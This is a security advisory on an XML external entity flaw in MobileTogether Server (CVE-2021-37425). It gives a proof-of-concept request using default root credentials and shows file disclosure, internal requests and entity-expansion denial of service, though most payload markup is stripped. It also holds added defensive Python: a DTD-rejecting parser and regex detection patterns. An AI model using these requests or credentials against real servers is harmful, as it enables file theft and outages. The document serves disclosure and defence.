Advisory: XML External Entity Expansion in MobileTogether Server
RedTeam Pentesting discovered a vulnerability in the MobileTogether
server which allows users with access to at least one app to read
arbitrary, non-binary files from the file system and perform server-side
requests. The vulnerability can also be used to deny availability of the
system. As an example, this advisory shows the compromise of the
server's certificate and private key.
### Details
- Product: MobileTogether Server
- Affected Versions: 7.0-7.3, potentially earlier versions as well
- Fixed Versions: 7.3 SP1
- Vulnerability Type: XML External and Exponential Entity Expansion
- Security Risk: medium
- Vendor URL: `https://www.altova.com/mobiletogether-server`
- Vendor Status: fixed version released
- Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2021-002`
- Advisory Status: published
- CVE: CVE-2021-37425
- CVE URL: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425`
### Introduction
"MobileTogether Server is the processing powerhouse for your native iOS,
Android, Windows, and browser-based apps.
MobileTogether Server is the back-end hub for your solutions and acts as
a gateway between end-users and your back-end data sources and
infrastructure."
(from the vendor's homepage)
### More Details
MobileTogether Server is a back-end application that hosts developed
apps and provides access to them from various platforms and devices.
Access to these apps is possible via native applications for devices
and operating systems or directly via the browser. Depending on the
configuration, access to the MobileTogether Server is either possible
via anonymous login or requires credentials.
During analysis of the communication between a MobileTogether client
application on a smartphone and the MobileTogether Server, HTTP requests
were observed containing JSON as well as XML data. Generally, the XML
data is used to signal changes in the UI or user-supplied input for the
app hosted in MobileTogether Server.
It was found that user-supplied XML external entities included in the
described HTTP requests are resolved by the MobileTogether Server and
the result is reflected in an HTTP response.
This behaviour allows attackers to read local files, perform server-side
requests and also deny the availability of the service through XML
exponential entity expansion. However, file disclosure is limited to
non-binary files and the absolute path needs to be known in advance.
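The parser setting that prevents this class of bug, shown as an added defender-side example (not code from the advisory or from the vendor): built on Python's expat bindings, the function below refuses any DOCTYPE declaration in client-supplied XML. External entities, parameter entities and exponential expansion all need a DTD, so rejecting the DTD closes the whole class without a deny-list of entity names. The function names and the sample documents are constructed assumptions.

```python
import xml.parsers.expat


class DtdNotAllowed(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or entity declaration."""


def parse_untrusted_xml(document: bytes) -> dict:
    """Parse XML from an untrusted client and return {element name: text}.

    Any DOCTYPE declaration aborts parsing before a single entity can be
    declared, so file reads, server-side requests and entity expansion
    are all refused at the same point.
    """
    parser = xml.parsers.expat.ParserCreate()
    result: dict = {}
    stack: list = []  # names of the currently open elements

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdNotAllowed(f"DOCTYPE {name!r} rejected")

    def entity_decl(*_args):
        # Defence in depth: not reachable without a DOCTYPE, but cheap.
        raise DtdNotAllowed("entity declaration rejected")

    def external_entity_ref(*_args):
        # Returning False tells expat the reference could not be resolved,
        # which aborts the parse instead of fetching anything.
        return False

    def start_element(name, attrs):
        stack.append(name)
        result.setdefault(name, "")

    def end_element(name):
        stack.pop()

    def char_data(data):
        if stack:
            result[stack[-1]] += data

    parser.StartDoctypeDeclHandler = start_doctype
    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = char_data
    parser.Parse(document, True)
    return result


def is_accepted(document: bytes) -> bool:
    """True if the document parses without any DTD-related rejection."""
    try:
        parse_untrusted_xml(document)
        return True
    except DtdNotAllowed:
        return False


# Constructed samples standing in for the XML a client places in the
# request's Changes field: one benign document and one carrying a DTD
# with a harmless internal entity.
BENIGN = b"<change><visible>false</visible></change>"
WITH_DTD = (b'<!DOCTYPE change [<!ENTITY e "x">]>'
            b"<change><visible>&e;</visible></change>")

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN))
    print("document with DTD accepted:", is_accepted(WITH_DTD))
```

The same effect is available in other stacks by disabling DTD processing in the parser factory (for example `disallow-doctype-decl` in Java SAX parsers, or `resolve_entities=False` together with `no_network=True` in lxml); the point is that the decision is made by parser configuration, not by inspecting entity names.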
### Proof of Concept
MobileTogether Server comes with a series of example applications. To
exploit the vulnerability, access to at least one application is
required. In the following, the app EuroFXrates and the default user
root with the default password root is used for demonstration of the
vulnerability.
The following HTTP request contains the minimal data required to be
accepted by the server, resulting in the processing of the XML data
stored within the JSON field InfosetChanges/Changes (formatted for
better readability):
```
POST /workflowmanagement HTTP/1.1
Authorization: Basic cm9vdDpyb290
Content-Type: application/json
Content-Length: 851
Host: 192.168.1.1:8085
Connection: close
{
"DeviceY": 0,
"ClientVersionName": "7.2.2",
"MobileManufacturer": "",
"AllInfosetsSerialized": true,
"ServerName": "192.168.1.1",
"ProtocolVersionMax": "2",
"Language": "en-US",
"DeviceType": "",
"ClientKey": "1_11148009037086584903_2744738433663963458",
"DeviceXDPI": 0,
"DeviceYDPI": 0,
"DeviceYCanvasWithTabs": 0,
"ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
"ProtocolVersionMin": "2",
"DeviceXCanvas": 0,
"ClientArchiveVersionMin": "-74",
"MobileOSVersion": "Android 11",
"DeviceXCanvasWithTabs": 0,
"ClientArchiveVersionMax": "65",
"User": "root",
"DeviceX": 0,
"DesignFileName": "/public/EuroFXrates",
"EncValue": "M9EBc6-7P5cd0",
"DeviceYCanvas": 0,
"MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
"InfosetChanges": [
{
"Changes": [
{
"": "
false
"
}
],
"ID": "$$PERS$$"
}
],
"DeviceIsPortrait": true
}
```
With the following XML data it can be verified that XML entities are
resolved and reflected within predefined XML tags in the HTTP response:
```
]>
&redteam;
```
The HTTP response contains the resolved XML entity:
```
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
RedTeam Pentesting
[...]
```
The following example shows how local files can be read from the server
system hosting the MobileTogether Server on a Windows system:
```
]>
&redteam;
```
The content of the file is shown below and formatted for better
readability:
```
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]
[...]
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[...]
```
One interesting target for attackers could be the configuration file for
the MobileTogether Server residing at the following fixed location:
```
C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
```
For example, if the server supports HTTPS, the absolute path to the
server's certificate and private key is stored in its configuration.
Furthermore, external XML entities can be used to access third-party
websites as well as web services that are only available internally.
Together with an externally hosted XML DTD, response information can be
extracted:
```
">
% dtd; ]>
&redteam;
```
The DTD contains the following information:
```
```
In the HTTP response, the HTML markup delivered by internal.example.com
is now visible.
A further vulnerability attacks the availability of the service through
XML exponential entity expansion. This is demonstrated with the
following XML document:
```
]>
&redteam20;
```
Sending the shown XML document leads to a huge server-side resource
allocation which ultimately disrupts the availability of the
MobileTogether Server.
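A constructed detection example, added here and not part of the advisory: it extracts the XML strings from the InfosetChanges/Changes values of a request body (the field the proof of concept above abuses) and flags a DOCTYPE, external-entity keywords and a high ratio of entity references to declarations, so that such requests can be logged or blocked at a reverse proxy or when reviewing captured traffic. The function names, the sample bodies and the expansion threshold are assumptions.

```python
import json
import re

# The app's UI change messages have no legitimate use for a DTD, so any
# DOCTYPE in client-supplied XML is worth flagging on its own.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
ENTITY_DECL_RE = re.compile(r"<!ENTITY\b", re.IGNORECASE)
# External (SYSTEM/PUBLIC) general or parameter entity declarations.
EXTERNAL_RE = re.compile(
    r"<!ENTITY\s+(?:%\s*)?\w+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)
# Entity references other than the five predefined XML entities.
ENTITY_REF_RE = re.compile(r"&(?!(?:amp|lt|gt|quot|apos);)\w+;")


def xml_fragments(body: dict) -> list:
    """Return every string value found under InfosetChanges[].Changes[]."""
    out = []
    for infoset in body.get("InfosetChanges", []):
        for change in infoset.get("Changes", []):
            for value in change.values():
                if isinstance(value, str):
                    out.append(value)
    return out


def classify_fragment(xml: str) -> list:
    """Return the list of findings for one XML fragment."""
    findings = []
    if DOCTYPE_RE.search(xml):
        findings.append("doctype")
    if EXTERNAL_RE.search(xml):
        findings.append("external-entity")
    declared = len(ENTITY_DECL_RE.findall(xml))
    referenced = len(ENTITY_REF_RE.findall(xml))
    # Heuristic threshold (assumption): expansion attacks reference each
    # declared entity many times, ordinary documents roughly once.
    if declared >= 2 and referenced >= 2 * declared:
        findings.append("entity-expansion")
    return findings


def scan_request(raw_body: bytes) -> dict:
    """Inspect one JSON request body and return a summary for logging."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        return {"user": None, "design": None, "findings": ["invalid-json"]}
    findings = set()
    for fragment in xml_fragments(body):
        findings.update(classify_fragment(fragment))
    return {
        "user": body.get("User"),
        "design": body.get("DesignFileName"),
        "findings": sorted(findings),
    }


def make_body(xml: str) -> bytes:
    """Constructed request body mirroring the layout of the request above."""
    return json.dumps({
        "User": "root",
        "DesignFileName": "/public/EuroFXrates",
        "InfosetChanges": [{"Changes": [{"": xml}], "ID": "$$PERS$$"}],
    }).encode()


BENIGN = make_body("<change><visible>false</visible></change>")
WITH_DTD = make_body('<!DOCTYPE c [<!ENTITY e "x">]><change>&e;</change>')
# Shrunken two-level expansion sample, just large enough to trip the
# heuristic; it expands to four characters, not to gigabytes.
EXPANSION = make_body(
    '<!DOCTYPE c [<!ENTITY a "x"><!ENTITY b "&a;&a;&a;&a;">]>'
    '<change>&b;</change>')

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("dtd", WITH_DTD),
                         ("expansion", EXPANSION)]:
        print(name, scan_request(sample))
```

The summary carries the User and DesignFileName fields so that a hit can be tied to the account and app it arrived through; the "doctype" finding alone is sufficient to block, the other two only add detail for triage.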
### Workaround
None known.
### Fix
According to the vendor, upgrading to version 7.3 SP1 resolves the
vulnerability.
### Security Risk
Attackers in possession of an account for a MobileTogether Server with
access to at least one app are able to read files from the server
system, conduct HTTP requests to external and internal systems and can
also deny the availability of the service. Access might also be possible
through default credentials or the anonymous user.
### Timeline
- 2021-06-21 Vulnerability identified
- 2021-06-23 Requested a security contact from vendor
- 2021-06-25 Security contact established with vendor
- 2021-07-05 Customer approved disclosure to vendor
- 2021-07-05 Vendor notified
- 2021-07-20 Vendor acknowledged vulnerability
- 2021-07-22 CVE ID requested
- 2021-07-23 CVE ID assigned
- 2021-07-28 Vendor released fixed version
- 2021-08-10 Advisory released
### RedTeam Pentesting GmbH
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at:
### Working at RedTeam Pentesting
RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit: